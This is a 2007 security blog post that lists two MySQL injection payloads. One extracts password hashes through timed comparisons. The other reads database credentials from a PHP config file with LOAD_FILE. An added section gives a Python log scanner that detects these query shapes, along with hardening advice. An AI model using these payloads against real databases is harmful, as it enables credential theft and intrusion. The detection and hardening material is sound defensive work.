2 Interesting SQL Vectors
By secgeeks - Posted on June 29th, 2007

Johan Adriaans contacted me through email and gave me a few more SQL vectors to add to my cheat sheet. These are pretty interesting because they give an alternative way of approaching the same attacks, which could be useful to stay under the radar, or when some vectors are not possible.

Alternative way of extracting hashes

Normally we would use SUBSTRING() to select upon hashes, but it is also possible to use ordinary comparison operators to select upon them. Like these examples, which I modified to work in a real SQL injection:

SELECT IF(password > '1', BENCHMARK(1000000,MD5('x')),null) FROM test
SELECT IF(password > '09', BENCHMARK(1000000,MD5('x')),null) FROM test
SELECT IF(password > '09a', BENCHMARK(1000000,MD5('x')),null) FROM test

Using LOAD_FILE to scan PHP files

This one is really interesting because of the creative approach: extracting the database login from PHP files by loading the PHP file right into the SQL layer and using SUBSTRING to select a string to match:

SELECT SUBSTRING(LOAD_FILE('/var/www/html/config.php'),20,24) = 'root';

I'm updating my SQL cheat sheet somewhere this week; I have a few things to add myself as well. Aiming for the most complete MySQL cheat sheet.
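Both vectors above leave a recognisable shape in the MySQL general query log: an IF() wrapped around a BENCHMARK() with a large iteration count, a LOAD_FILE() call, or an ordering comparison (>, <) against a password column. The following is an added detection example, not code from the original post or from the cheat sheet it describes. It scans constructed general_log-style lines (the sample lines, the rule names and the `scan_general_log` function are all assumptions of this example) and reports which rule each suspicious query matched:

```python
import re

# Constructed sample lines in MySQL general_log style (timestamp, thread id, command, query).
# These are illustrative, not captured from any real server.
SAMPLE_LOG = """\
2007-06-29T10:00:01Z\t12 Query\tSELECT id, name FROM test WHERE id = 5
2007-06-29T10:00:02Z\t12 Query\tSELECT IF(password > '09a', BENCHMARK(1000000,MD5('x')),null) FROM test
2007-06-29T10:00:03Z\t13 Query\tSELECT SUBSTRING(LOAD_FILE('/var/www/html/config.php'),20,24) = 'root'
2007-06-29T10:00:04Z\t14 Query\tSELECT name FROM test WHERE password > 'a'
"""

# One general_log "Query" record: timestamp, thread id, the word Query, then the statement.
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<thread>\d+)\s+Query\s+(?P<query>.*)$")

# Each rule is a name plus a pattern for one of the query shapes discussed above.
RULES = [
    # IF(... BENCHMARK(<large count>, ...)) is the time-based blind probe shape.
    ("benchmark_blind_probe",
     re.compile(r"\bIF\s*\(.*?\bBENCHMARK\s*\(\s*\d{5,}", re.IGNORECASE | re.DOTALL)),
    # Any LOAD_FILE() call reads from the server filesystem; web applications rarely need it.
    ("load_file_read", re.compile(r"\bLOAD_FILE\s*\(", re.IGNORECASE)),
    # Ordering comparison against a secret column: the operator-based hash extraction.
    ("ordinal_compare_on_secret",
     re.compile(r"\bpassword\b\s*(?:>=|<=|>|<)\s*'", re.IGNORECASE)),
]


def scan_general_log(text):
    """Return one finding per suspicious query: line number, thread id, matched rule names, query."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        m = LOG_LINE.match(raw)
        if not m:
            continue  # not a Query record (Connect/Quit lines, continuation lines, ...)
        query = m.group("query")
        hits = [name for name, pattern in RULES if pattern.search(query)]
        if hits:
            findings.append({
                "line": line_no,
                "thread": int(m.group("thread")),
                "rules": hits,
                "query": query,
            })
    return findings


if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG):
        print(f"line {f['line']} thread {f['thread']}: {', '.join(f['rules'])}")
        print(f"    {f['query']}")
```

On the sample above, lines 2, 3 and 4 are reported and line 1 is not. Log-based rules like these are a backstop, not the fix: parameterised queries remove the injection point itself, and LOAD_FILE() only works at all when the database account holds the FILE privilege and the path is permitted by secure_file_priv, so an application account without FILE and a restrictive secure_file_priv setting take the second vector away regardless of the query text.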